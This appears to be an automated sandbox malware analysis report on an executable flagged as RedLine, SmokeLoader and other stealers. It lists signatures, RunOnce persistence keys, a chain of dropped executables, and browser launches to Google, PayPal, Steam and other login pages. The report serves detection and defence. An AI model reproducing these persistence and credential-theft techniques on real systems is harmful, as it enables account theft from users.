Malware Analysis Report

2024-11-13 19:10

Sample ID 231111-yrh6hsbd4v
Target e094893c307756f26546790c7964143c.exe
SHA256 f658bd48724915663fe4ff16df8b47b52fe647d8ec0e79d3da8a2399bb579556
Tags
glupteba mystic redline smokeloader zgrat taiga up3 backdoor dropper evasion infostealer loader persistence rat stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview


Threat Level: Known bad

The file e094893c307756f26546790c7964143c.exe was found to be: Known bad.

Malicious Activity Summary


RedLine payload

Glupteba

SmokeLoader

Mystic

Detect ZGRat V1

Glupteba payload

ZGRat

Detect Mystic stealer payload

RedLine

Blocklisted process makes network request

Modifies Windows Firewall

Stops running service(s)

Downloads MZ/PE file

Executes dropped EXE

Adds Run key to start application

AutoIT Executable

Suspicious use of SetThreadContext

Launches sc.exe

Unsigned PE

Enumerates physical storage devices

Program crash

Suspicious use of SendNotifyMessage

Suspicious behavior: MapViewOfSection

Checks SCSI registry key(s)

Suspicious use of WriteProcessMemory

Enumerates system info in registry

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious use of FindShellTrayWindow

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-11-11 20:01

Signatures

Unsigned PE


Analysis: behavioral1

Detonation Overview

Submitted

2023-11-11 20:01

Reported

2023-11-11 20:03

Platform

win10v2004-20231023-en

Max time kernel

41s

Max time network

154s

Command Line

"C:\Users\Admin\AppData\Local\Temp\e094893c307756f26546790c7964143c.exe"

Signatures

Detect Mystic stealer payload


Detect ZGRat V1


Glupteba

loader dropper glupteba

Glupteba payload


Mystic

stealer mystic

RedLine

infostealer redline

RedLine payload


SmokeLoader

trojan backdoor smokeloader

ZGRat

rat zgrat

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\system32\cmd.exe N/A

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Stops running service(s)

evasion

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\e094893c307756f26546790c7964143c.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\TD2LQ80.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Ih4sd84.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\HG4OZ12.exe N/A

AutoIT Executable


Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\System32\sc.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\7My72nk.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\7My72nk.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\7My72nk.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\7My72nk.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\7My72nk.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1KW31rv9.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1KW31rv9.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4836 wrote to memory of 4900 N/A C:\Users\Admin\AppData\Local\Temp\e094893c307756f26546790c7964143c.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\TD2LQ80.exe
PID 4900 wrote to memory of 4588 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\TD2LQ80.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Ih4sd84.exe
PID 4588 wrote to memory of 3036 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Ih4sd84.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\HG4OZ12.exe
PID 3036 wrote to memory of 4664 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\HG4OZ12.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1KW31rv9.exe
PID 4664 wrote to memory of 840 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1KW31rv9.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4664 wrote to memory of 3092 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1KW31rv9.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 840 wrote to memory of 4560 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3092 wrote to memory of 4264 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4664 wrote to memory of 3724 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1KW31rv9.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3724 wrote to memory of 4516 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4664 wrote to memory of 2488 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1KW31rv9.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2488 wrote to memory of 3832 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4664 wrote to memory of 4652 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1KW31rv9.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4652 wrote to memory of 3588 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4664 wrote to memory of 1408 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1KW31rv9.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1408 wrote to memory of 4332 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4664 wrote to memory of 5008 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1KW31rv9.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5008 wrote to memory of 1112 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4664 wrote to memory of 2992 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1KW31rv9.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2992 wrote to memory of 5140 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 840 wrote to memory of 5256 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Processes

C:\Users\Admin\AppData\Local\Temp\e094893c307756f26546790c7964143c.exe

"C:\Users\Admin\AppData\Local\Temp\e094893c307756f26546790c7964143c.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\TD2LQ80.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\TD2LQ80.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Ih4sd84.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Ih4sd84.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\HG4OZ12.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\HG4OZ12.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1KW31rv9.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1KW31rv9.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x168,0x16c,0x170,0x144,0x174,0x7ff843cb46f8,0x7ff843cb4708,0x7ff843cb4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ff843cb46f8,0x7ff843cb4708,0x7ff843cb4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ff843cb46f8,0x7ff843cb4708,0x7ff843cb4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://store.steampowered.com/login/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ff843cb46f8,0x7ff843cb4708,0x7ff843cb4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://twitter.com/i/flow/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x40,0x16c,0x7ff843cb46f8,0x7ff843cb4708,0x7ff843cb4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://steamcommunity.com/openid/loginform/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x148,0x170,0x7ff843cb46f8,0x7ff843cb4708,0x7ff843cb4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.epicgames.com/id/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ff843cb46f8,0x7ff843cb4708,0x7ff843cb4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.paypal.com/signin

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ff843cb46f8,0x7ff843cb4708,0x7ff843cb4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1996,4033172932542255565,820926077693656777,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2180 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2256,5832224244155601027,6033879062137679741,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2904 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2112,11968864724054103788,16949942370129669072,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2220 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2256,5832224244155601027,6033879062137679741,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2320 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2112,11968864724054103788,16949942370129669072,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1992 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2256,5832224244155601027,6033879062137679741,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2268 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1996,4033172932542255565,820926077693656777,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2232 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2132,1739929218482369560,16031172266000532866,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2196 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,1739929218482369560,16031172266000532866,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2144 /prefetch:2

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ff843cb46f8,0x7ff843cb4708,0x7ff843cb4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2256,5832224244155601027,6033879062137679741,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3920 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1556,1223519091113919437,8632041722928729955,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2128 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2256,5832224244155601027,6033879062137679741,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4076 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2096,1139551487477742509,12714646005731208395,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2100 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2256,5832224244155601027,6033879062137679741,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4272 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2256,5832224244155601027,6033879062137679741,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3360 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2256,5832224244155601027,6033879062137679741,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3344 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2076,4846431870790519868,12828941444815406723,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2140 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2076,4846431870790519868,12828941444815406723,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2088 /prefetch:2

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2256,5832224244155601027,6033879062137679741,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4472 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

